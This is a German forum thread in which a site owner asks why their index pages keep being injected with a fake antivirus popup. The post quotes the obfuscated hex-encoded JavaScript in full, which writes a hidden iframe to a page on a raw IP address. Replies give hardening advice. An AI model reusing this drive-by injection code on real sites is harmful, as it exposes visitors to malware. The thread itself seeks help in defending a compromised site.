Website Sicherheit
Ich habe ein Problem mit meiner Website, vor ein paar Tagen bemerkte ich das auf meienr Website imemr ein Popup aufgeht indem darauf hingewiesen wird das der PC von einem Virus befallen sei und man auf dei Seite "www.advancedxpdefender.com" gehen soll um sich eine Software runterzuladen.
Dann habe ich mir mal den Quellcode angeschaut und gesehen das jemand meine index (.php und .html) dateien manipuliert hat und folgenden Code eingefügt hat:
<script>
<!--
var d=document,kol=561;
function O10H48514B24F1CE6(H48514B24F20E3){ function H48514B24F24DF() {return 16;} return( parseInt(H48514B24F20E3,H48514B24F24DF()));}function H48514B24F2CEE(H48514B24F30EA){ var H48514B24F34E4='';for(H48514B24F38E1=0; H48514B24F38E1<H48514B24F30EA.length; H48514B24F38E1+=2){ H48514B24F34E4 += ( String.fromCharCode (O10H48514B24F1CE6(H48514B24F30EA.substr(H48514B24F38E1, 2))));}return H48514B24F34E4;} document.write(H48514B24F2CEE('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38323238292B27623762325C272077696474683D323432206865696768743D3334207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>
Habe nun schon mehrmals den Code aus allen Index Dateien rausgenommen aber es passiert immer wieder!
Mein FTP Passwort kann meines Erachtens anch nicht gekanckt worden sein,da dies sehr stark ist (enthält Groß- und Kleinbuchstaben,Sonderzeichen und Zahlen).
Wie ist es möglich das jemand diese Dateien manipuliert?
Wie kann ich mich dagegen schützen?
Danke schonmal!
Grüße
Dann habe ich mir mal den Quellcode angeschaut und gesehen das jemand meine index (.php und .html) dateien manipuliert hat und folgenden Code eingefügt hat:
<script>
<!--
var d=document,kol=561;
function O10H48514B24F1CE6(H48514B24F20E3){ function H48514B24F24DF() {return 16;} return( parseInt(H48514B24F20E3,H48514B24F24DF()));}function H48514B24F2CEE(H48514B24F30EA){ var H48514B24F34E4='';for(H48514B24F38E1=0; H48514B24F38E1<H48514B24F30EA.length; H48514B24F38E1+=2){ H48514B24F34E4 += ( String.fromCharCode (O10H48514B24F1CE6(H48514B24F30EA.substr(H48514B24F38E1, 2))));}return H48514B24F34E4;} document.write(H48514B24F2CEE('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38323238292B27623762325C272077696474683D323432206865696768743D3334207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>
Habe nun schon mehrmals den Code aus allen Index Dateien rausgenommen aber es passiert immer wieder!
Mein FTP Passwort kann meines Erachtens anch nicht gekanckt worden sein,da dies sehr stark ist (enthält Groß- und Kleinbuchstaben,Sonderzeichen und Zahlen).
Wie ist es möglich das jemand diese Dateien manipuliert?
Wie kann ich mich dagegen schützen?
Danke schonmal!
Grüße
Bitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 89909
Url: https://administrator.de/forum/website-sicherheit-89909.html
Ausgedruckt am: 23.12.2024 um 23:12 Uhr
10 Kommentare
Neuester Kommentar
Hallo,
was ist das für ein Webserver?
M$ oder *nix?
IIS oder Apache?
Wenn jemand deinen Server gehackt hat (und das er das hat steht außer Frage) dann ist evtl. auch ein Rootkit installiert, in diesem Fall ist die einzig sichere Möglichkeit, alles neu zu installieren.
Bitte überbewerte dein "starkes FTP-Passwort" nicht, bei FTP werden die Passwörter unverschlüsselt übertragen!
mfg
Harald
was ist das für ein Webserver?
M$ oder *nix?
IIS oder Apache?
Wenn jemand deinen Server gehackt hat (und das er das hat steht außer Frage) dann ist evtl. auch ein Rootkit installiert, in diesem Fall ist die einzig sichere Möglichkeit, alles neu zu installieren.
Bitte überbewerte dein "starkes FTP-Passwort" nicht, bei FTP werden die Passwörter unverschlüsselt übertragen!
mfg
Harald
Moin,
setzt dich direkt mit deinem Hoster in Verindung. Bei shared Hosting genügt es u.U. wenn eine Site auf dem Server gehackt wurde. Die sollen das checken!
Zusätzlich solltest Du Deine eigenen PHP Scripts auf Sicherheitslücken hin überprüfen, oder falls die "fremde" PHP Anwendungen einsetzt: immer zeitnah mit den aktuelle Patches verseorgen.
lg,
Slainte
setzt dich direkt mit deinem Hoster in Verindung. Bei shared Hosting genügt es u.U. wenn eine Site auf dem Server gehackt wurde. Die sollen das checken!
Und angenommen ich würde alles neu machen, wie kann ich mich danach dann
schützen?
Im falle Shared Hosting eigentlich fast nicht. Du bist zu 100% von Deinem Hoster abhängig. Wenn der schlampig arbeitet und/oder nicht patcht kannst Du kaum was machen (ausser kündigen ^^).schützen?
Zusätzlich solltest Du Deine eigenen PHP Scripts auf Sicherheitslücken hin überprüfen, oder falls die "fremde" PHP Anwendungen einsetzt: immer zeitnah mit den aktuelle Patches verseorgen.
lg,
Slainte
1.
stable und aktuell bedeutet nicht immer, daß die Dinger auch sicher sind, bestes Beispiel ist hier wohl Joomla
(gibt z.Zt. 4 0day-Exploits, zzgl. den alten Bekannten für die Extensions)
2.
Die Berechtigung für gewisse Dateien sollten auch ordnungsgemäß gesetzt sein...
Lonesome Walker
stable und aktuell bedeutet nicht immer, daß die Dinger auch sicher sind, bestes Beispiel ist hier wohl Joomla
(gibt z.Zt. 4 0day-Exploits, zzgl. den alten Bekannten für die Extensions)
2.
Die Berechtigung für gewisse Dateien sollten auch ordnungsgemäß gesetzt sein...
Lonesome Walker